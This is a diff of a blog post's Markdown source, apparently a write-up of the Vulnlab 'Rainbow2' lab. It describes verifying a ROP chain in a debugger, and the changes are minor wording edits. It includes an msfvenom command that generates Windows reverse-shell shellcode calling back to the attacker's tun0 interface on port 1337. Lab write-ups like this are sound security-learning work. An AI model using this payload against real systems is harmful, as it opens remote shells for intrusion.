dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 r.close()
 ```

-We can corroborate our chain is working using the debugger.
+We can corroborate our rop-chain is working using the debugger.
 We should stop before the _CC_ (breakpoint) instruction is executed.

 ![](https://github.com/dplastico/dplastico.github.io/raw/main/_posts/img/2023-07-02-19-08-35.png)

 Yay!
 Now we can execute on the stack (we can confirm by executing on the debugger).
 We also can control the execution to point to our desired Shellcode, so we can send a reverse shell.
-At the time, I used the following msfvenom command to generate it.
+At the time, I used the following __msfvenom__ command to generate it.

 ```
 msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=1337 -b"\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode
 ```

 Let's replace our shellcode variable with the one generated with _msfvenom_.
 You can verify that it is working in your local VM  before sending the payload if you need to.
-The only thing and this is maybe due to latency, but  I have to put a _sleep()_ call before sending the payload to avoid some weird crashes, as shown below.
+The only thing and this is maybe due to latency, but  I had to put a _sleep()_ call before sending the payload to avoid some weird crashes, as shown below.

 ```python
 payload  = b""